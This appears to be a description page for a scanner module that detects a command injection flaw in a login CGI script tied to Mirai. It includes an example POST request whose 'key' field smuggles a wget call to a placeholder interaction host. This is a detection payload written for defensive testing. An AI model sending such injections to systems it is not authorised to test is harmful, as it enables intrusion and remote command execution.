Mirai - Remote Command Injection

What is "Mirai - Remote Command Injection?"

The "Mirai - Remote Command Injection" module is designed to detect a critical vulnerability in the Mirai software. Mirai is a malware that targets Internet of Things (IoT) devices and turns them into a botnet. This module specifically targets the login CGI script in Mirai, where a key parameter is not properly sanitized, leading to a command injection vulnerability. The severity of this vulnerability is classified as critical.

This module was authored by gy741.

Impact

If exploited, this vulnerability allows an attacker to execute arbitrary commands on the affected device. This can lead to unauthorized access, data theft, and potential disruption of services.

How the module works?

The "Mirai - Remote Command Injection" module works by sending a crafted HTTP request to the target device's login CGI script. The request includes a payload that exploits the command injection vulnerability. Here is an example of the HTTP request:

POST /cgi-bin/login.cgi HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded

key=';`wget http://<InteractionURL>`;#

The module also includes matching conditions to determine if the target device is vulnerable. In this case, it checks if the interaction protocol is HTTP.

If the module detects a match, it will report the vulnerability.